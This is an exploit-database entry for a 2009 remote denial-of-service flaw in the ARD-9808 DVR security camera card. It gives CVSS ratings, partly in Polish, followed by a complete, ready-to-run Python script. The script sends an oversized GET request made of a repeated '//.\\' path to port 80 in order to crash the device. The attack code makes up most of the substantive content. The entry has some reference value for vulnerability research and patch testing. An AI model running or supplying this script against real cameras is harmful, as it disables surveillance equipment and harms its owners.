ARD-9808 DVR Card Security Camera (GET Request) Remote DoS Exploit

2009.07.08
Credit: Stack
Risk: High
Local: No
Remote: Yes
CWE: CWE-20


Ogólna skala CVSS: 7.8/10
Znaczenie: 6.9/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Brak
Wpływ na integralność: Brak
Wpływ na dostępność: Pełny

import socket import sys print "----------------------------------------------------------------" print " ARD-9808 DVR Card Security Camera <= Remote Denial Of Service " print " author: Stack " print "----------------------------------------------------------------" host = "127.0.0.1" port = 80 try: buff = "//.\\" * 1000 request = "GET " + buff + " HTTP/1.0" connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connection.connect((host, port)) connection.send(request) raw_input('\n\nExploit completed. Press "Enter" to quit...') sys.exit except: raw_input('\n\nUnable to connect. Press "Enter" to quit...')

Referencje:

http://www.milw0rm.com/exploits/9067


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top